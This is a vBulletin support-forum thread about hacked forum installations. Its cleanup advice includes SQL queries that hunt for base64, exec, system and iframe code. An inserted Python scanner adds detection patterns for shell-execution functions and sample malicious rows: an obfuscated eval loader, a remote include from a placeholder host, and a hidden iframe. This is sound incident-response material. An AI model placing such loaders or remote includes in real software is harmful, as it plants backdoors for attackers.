jforjustice.co.uk/banksters - Hacked

  • Wayne Luke
    vBulletin Technical Support Lead
    • Aug 2000
    • 73976

    #31
    Originally posted by cobradude
    So, the first time I was hacked, they gained access to admincp, they inserted a plug in, as well as sent mail to my users. A holes! I locked down the ability to execute to a particular IP, changed all passwords, and they came back, but this time, they just hit the postparsed table and injected their bit of java to redirect every link.

    Any additional ideas on how to lock this down? I have vbseo and other plugins. This spans latest 4 and 3.8 boards I run.
    Make sure there are no remote access users on your database. Make sure none of your database users can access from wildcard % hosts.

    There is no way for them to simply "Hit the postparsed table" unless there is a plugin allowing them access to the database, phpmyadmin or similar is not secure on the server or there are remote access users.

    Wayne Luke
    The Rabid Badger - a vBulletin Cloud demonstration site.
    vBulletin 5 API


    • motoxer311
      Member
      • Nov 2008
      • 59
      • 3.7.x

      #32
      English please.. How do I fix ASAP without having to go through 4 years of computer science?


      • cobradude
        Senior Member
        • Mar 2001
        • 147

        #33
        My phpmyadmin is secure to my IP, I don't see any new plugins....How do I validate that there are no remote access users? Thanks for the guidance/help.


        • Wayne Luke
          vBulletin Technical Support Lead
          • Aug 2000
          • 73976

          #34
          Originally posted by motoxer311
          English please.. How do I fix ASAP without having to go through 4 years of computer science?
          This is all pretty basic website maintenance here and plain simple logic. If you can't follow the steps, you'll need to open a support ticket since you do have ticket support.

          Originally posted by cobradude
          My phpmyadmin is secure to my IP, I don't see any new plugins....How do I validate that there are no remote access users? Thanks for the guidance/help.
          You would need to check the MySQL users table in the mysql database. phpMyAdmin may show this if you're logging in as a root user. Otherwise ask your hosting provider or server administrator.

          Wayne Luke
          The Rabid Badger - a vBulletin Cloud demonstration site.
          vBulletin 5 API


          • motoxer311
            Member
            • Nov 2008
            • 59
            • 3.7.x

            #35
            Passwords have been changed for admin IDs.. Below is a list of plugins that I have installed.. Majority of them were disabled as of last week due to 18,000+ emails going out..

            Any plugins match those from other sites having issues?


            vBulletin 4.1.11
            AME 3 3.0.1 Auto Media Embedder and Video Extender
            BBR - Google Analytics Addon 1.0.3 Adds Google analytics code below the</head> tag.
            DragonByte Tech: vBShop (Lite) 1.2.1 vBShop is an advanced Shop system for vBulletin, designed to let your members spend accumulated points on various forum actions.
            DragonByte Tech: vBShout (Lite) 5.4.4 vBShout by DragonByte Technologies: Allow your forum members to chat with each other in real-time with this AJAX-powered Shoutbox!
            Hasann - Sub-Forum Manager 4.0.1 Sub-Forum Manager by Hasann
            ibProArcade for vBulletin 2.7.0 ibProArcade - professional Arcade System for vBulletin
            Post Thank You Hack 7.82 Post Thank You Hack
            Skimlinks Plugin 4.1.11 Official Skimlinks plugin for vBulletin
            User CP Referral ID and Referrer in Profile 1.0.5 This product will add a content box at the top of the User CP displaying a customizable referral "Message" and the member's "Referral Link" along with their referral count. This will also show who referred a user in their profile in the About Me tab.
            vBadvanced CMPS 4.1.2 vBadvanced Content Management & Portal System
            vBH - Add new tabs 1.2 1.2 This plugin adds new tabs to the main navbar
            vBSEO 3.5.1 PL1 vBulletin SEO
            vBSkinZone - Simple Ad Management 1.0 Enables the inclusion of ads without editing templates
            vbStopForumSpam 0.61 This plugin allows you to check new registrations against www.StopForumSpam.com
            vBulletin Blog 4.1.11 Personal web log, integrated with vBulletin.
            vBulletin CMS 4.1.11 Content Management System
            VSa - Advanced Forum Statistics 7.0.3 VSa - Advanced Forum Statistics
            VSa - Login To User Account 3.0.5 VSa - Login To User Account
            VSa - PayPal Donate 5.0 VSa - PayPal Donate
            [APM] Advanced Product Management 4.0.001 Product Management Center: add/edit/delete product's components.


            • crashtestdummy
              New Member
              • Feb 2006
              • 11
              • 3.6.x

              #36
              Originally posted by motoxer311
              Passwords have been changed for admin IDs.. Below is a list of plugins that I have installed.. Majority of them were disabled as of last week due to 18,000+ emails going out..

              Any plugins match those from other sites having issues?


              vBadvanced CMPS, vBSEO, & Skimlinks

              I do believe the hackers installed Skimlinks on our system, since we didn't.
              tlzone.net
              ninja6zone.com
              rsvzone.com


              • Danny M
                Member
                • May 2010
                • 58

                #37
                Originally posted by crashtestdummy
                vBadvanced CMPS, vBSEO, & Skimlinks

                I do believe the hackers installed Skimlinks on our system, since we didn't.
                The hackers also installed Skimlinks on my forum, because I certainly didn't install it.


                • Wayne Luke
                  vBulletin Technical Support Lead
                  • Aug 2000
                  • 73976

                  #38
                  Originally posted by motoxer311
                  Passwords have been changed for admin IDs.. Below is a list of plugins that I have installed.. Majority of them were disabled as of last week due to 18,000+ emails going out..

                  Any plugins match those from other sites having issues?


                  vBShout just had an exploit found and a patch released. You should be on version 6.0.4 by now.


                  You need to be on 3.6.0 of vBSEO to prevent exploits in it.

                  You should be on vBAdvanced 4.1.3 to solve an exploit in it.

                  iBProArcade was recently quarantined on vBulletin.org due to an exploit and an update released. You need to make sure you're up to date here.

                  I don't know about your other addons.

                  Wayne Luke
                  The Rabid Badger - a vBulletin Cloud demonstration site.
                  vBulletin 5 API


                  • Wayne Luke
                    vBulletin Technical Support Lead
                    • Aug 2000
                    • 73976

                    #39
                    Originally posted by Danny M
                    The hackers also installed Skimlinks on my forum, because I certainly didn't install it.
                    Skimlinks is a standard vBulletin plugin and will be installed in all forums with version 4.1.2 or higher. Please read the release announcements, people.

                    Wayne Luke
                    The Rabid Badger - a vBulletin Cloud demonstration site.
                    vBulletin 5 API


                    • BirdOPrey5
                      Senior Member
                      • Jul 2008
                      • 9613
                      • 5.6.3

                      #40
                      You better check all the mods. In product manager see if the product name is a link, it should take you to their thread on vb.org or their homepage where you can check for the latest versions.


                      • rootnik
                        Senior Member
                        • Nov 2001
                        • 110

                        #41
                        It is starting to look like VBSEO is the common product among us. I'm beginning to wonder if running vbseo is even worth it.

                        I also logged into phpmyadmin and found that every user had a wildcard setup as an acceptable host. I know I didn't set these up... I even had ANY user set to be able to connect from ANY host. So check out those mysql privileges, password protect your phpmyadmin directory.

                        Save yourself some headaches in the future by password protecting your admincp directory. At the very least they wouldn't have been able to send out the emails if this was done. On my forums they attempted to send the same email out to 150,000+ members over 100 times, all through the admincp. Luckily I had JUST signed up for Amazon SES and my account was limited to 10,000 emails a day.

                        Also, I was able to login to my admincp because I am a member of the administrator usergroup only as an additional user group. My admins who were set as a user of the Administrator usergroup by default, we had to change their passwords for them before they could login.


                        • Chad
                          Senior Member
                          • Oct 2004
                          • 589
                          • 3.7.x

                          #42
                          Originally posted by rootnik
                          It is starting to look like VBSEO is the common product among us. I beginning to wonder if running vbseo is even worth it.

                          I also logged into phpmyadmin and found that every user had a wildcard setup as an acceptable host. I know I didn't set these up... I even had ANY user set to be able to connect from ANY host. So check out those mysql privileges, password protect your phpmyadmin directory.
                          Please explain what you mean by the wildcard setup for "every user". I just want to make sure I'm understanding you right.

                          Anyone else trace the problem to VBSEO? I did not have any "skim" plugin/product installed on my end but this is the 3rd time in the past 2 weeks this has happened.

                          Here is a strange note: the redirect does not happen to all forum categories, but only some. Further, if I turn off my forum (I'm still logged in as admin), the redirect disappears. Any idea about that?

                          This also happened yesterday and this is what I've done so far yesterday:

                          - changed database user/pw
                          - password protect admin directory (2 weeks ago), renamed admin directory (was already custom named)
                          - change my admin password
                          - change account password via cpanel
                          - apply about a dozen mod security rules
                          - enabled other security enhancements on php/apache (2 weeks ago) furthermore
                          [ Evidence & Prophecies Fulfilled : click ]
                          .:. Unanswered Prayers? /read this\


                          • pgowder
                            Senior Member
                            • Mar 2001
                            • 832

                            #43
                            I just got hit. I had vBSEO installed but not turned on.

                            I've turned off plugins, but still can't get into the site?

                            Any ideas?
                            PowWows.com


                            • Wayne Luke
                              vBulletin Technical Support Lead
                              • Aug 2000
                              • 73976

                              #44
                              1) Run Suspect File Diagnostics under Maintenance -> Diagnostics. Replace any files not containing the expected contents. Delete any files that are not part of vBulletin and that you can't identify as belonging to your addons. Or upload a new set of files.

                              2) Check the config.php for any suspicious code. It isn't checked by the suspect file diagnostic.

                              3) Search all templates for iframe tags. They should only appear in the following templates: bbcode_video, editor-ie.css, member.css, stylegenerator.css, vbcms.css, vbulletin.css, help_bbcodes, humanverify_recaptcha, search_common, and search_common_select_type

                              4) Check all your plugins for rogue include, require, include_once, or require_once code. All files should come from your server and be known to you.

                              5) Check your plugins for any base64 code. I recommend against using any plugins or products that include base64 code in them. However some "lite" or branded addons will include this as a means to prevent you from cheating the author. You'll have to make a personal call on these if you use them. This is often a sign of a hacked site.

                              6) Make sure that your plugins do not include calls to exec(), system(), or passthru() or iframes. These are also often signs of a hacked site.

                              Query for steps 4 and 5:
                              SELECT title, phpcode, hookname, product FROM plugin WHERE phpcode LIKE '%base64%' OR phpcode LIKE '%exec%' OR phpcode LIKE '%system%' OR phpcode LIKE '%passthru%' OR phpcode LIKE '%iframe%';

                              7) Run this query: SELECT styleid, title, template FROM template WHERE template LIKE '%base64%' OR template LIKE '%exec%' OR template LIKE '%system%' OR template LIKE '%passthru%' OR template LIKE '%iframe%';

                              It checks the templates for compromising code.

                              8) Check .htaccess to make sure there are no redirects there.

                              Wayne Luke
                              The Rabid Badger - a vBulletin Cloud demonstration site.
                              vBulletin 5 API

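The hunt described in steps 3 to 8 above, together with the wildcard-host check from #31/#34, as an added Python example (not code from this thread or from vBulletin): it runs the same checks over constructed rows shaped like vBulletin's plugin and template tables, a mysql.user listing and an .htaccess file, using word-bounded patterns instead of the LIKE '%exec%' wildcards so that a harmless name such as execute_query() does not produce a false hit. Table and column names follow the queries above; the sample rows, the example.invalid hosts and the hook names are constructed.

```python
import re

# Word-bounded patterns, tighter than the LIKE '%exec%' / '%system%' heuristic
# above: "execute_query(" or "ecosystem" will not trip them, a real exec( will.
SUSPECT_CODE = {
    "base64": re.compile(r"\bbase64_(?:de|en)code\s*\(", re.I),
    "eval": re.compile(r"\beval\s*\(", re.I),
    "shell": re.compile(r"\b(?:exec|system|passthru|shell_exec|proc_open|popen)\s*\(", re.I),
    "remote_include": re.compile(r"\b(?:include|require)(?:_once)?\b[^;]*?(?:https?|ftp)://", re.I),
    "iframe": re.compile(r"<iframe\b", re.I),
}
# Templates in which step 3 says an iframe tag is expected.
IFRAME_ALLOWED = {"bbcode_video", "editor-ie.css", "member.css", "stylegenerator.css",
                  "vbcms.css", "vbulletin.css", "help_bbcodes", "humanverify_recaptcha",
                  "search_common", "search_common_select_type"}
LOCAL_HOSTS = {"localhost", "127.0.0.1", "::1"}
# Step 8: a Redirect* directive, or a RewriteRule with an R flag or an absolute http(s) target.
REDIRECT_LINE = re.compile(
    r"^\s*(?:Redirect(?:Match|Permanent|Temp)?\b|RewriteRule\b.*(?:\[[^\]]*\bR\b[^\]]*\]|https?://))", re.I)

def _reasons(text):
    return sorted(name for name, rx in SUSPECT_CODE.items() if rx.search(text))

def scan_plugins(rows):
    """rows: dicts with title, hookname, phpcode (columns of vBulletin's plugin table)."""
    return [(r["title"], r["hookname"], rs) for r in rows if (rs := _reasons(r["phpcode"]))]

def scan_templates(rows):
    """rows: dicts with styleid, title, template; an iframe in an allowed template is not a hit."""
    hits = []
    for r in rows:
        reasons = [x for x in _reasons(r["template"]) if not (x == "iframe" and r["title"] in IFRAME_ALLOWED)]
        if reasons:
            hits.append((r["styleid"], r["title"], reasons))
    return hits

def remote_db_users(user_rows):
    """(user, host) pairs from mysql.user that may connect from a wildcard or non-local host."""
    return [(u, h) for u, h in user_rows if "%" in h or h not in LOCAL_HOSTS]

def htaccess_redirects(text):
    """Lines of an .htaccess file that send the visitor somewhere else (step 8)."""
    return [ln.strip() for ln in text.splitlines() if REDIRECT_LINE.search(ln)]

# Constructed sample data, not rows from any real forum.
PLUGINS = [
    {"title": "Skimlinks Plugin", "hookname": "global_start",
     "phpcode": "if ($vbulletin->options['skimlinks_enabled']) { $skim = true; }"},
    {"title": "Post Thank You Hack", "hookname": "postbit_display_complete",
     "phpcode": "$thanks->execute_query($postid);"},  # 'execute' must not count as exec()
    {"title": "Cache Warmer", "hookname": "init_startup",
     "phpcode": "eval(base64_decode('ZWNobyAnaGknOw=='));"},  # obfuscated loader, the step 5 pattern
    {"title": "SEO Helper", "hookname": "global_start",
     "phpcode": "include_once 'http://example.invalid/seo.txt';"},  # code pulled from another server, step 4
]
TEMPLATES = [
    {"styleid": 1, "title": "bbcode_video", "template": '<iframe src="{vb:raw url}"></iframe>'},
    {"styleid": 1, "title": "header", "template": '<div>{vb:raw ad}</div><iframe src="http://example.invalid/r" width="0" height="0"></iframe>'},
]
USERS = [("vbuser", "localhost"), ("vbuser", "%"), ("root", "localhost"), ("backup", "10.0.0.%")]
HTACCESS = """RewriteEngine On
RewriteRule ^forum/(.*)$ showthread.php?t=$1 [L]
RewriteRule ^(.*)$ http://example.invalid/landing [R=302,L]
"""
```

Run the four functions over rows pulled from your own database and .htaccess; anything they return is a lead to inspect by hand, not proof of compromise on its own.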

                              • rootnik
                                Senior Member
                                • Nov 2001
                                • 110

                                #45
                                Originally posted by Chad
                                Please explain what you mean by the wildcard setup for "every user". I just want to make sure I'm understanding you right.
                                In phpmyadmin, under privileges it shows a list of mysql users. When I set up a database user I choose to only let them connect via localhost. Somehow every database user has been granted access to the database remotely, from any host.

                                Last edited by rootnik; Sat 24 Mar '12, 7:35am.
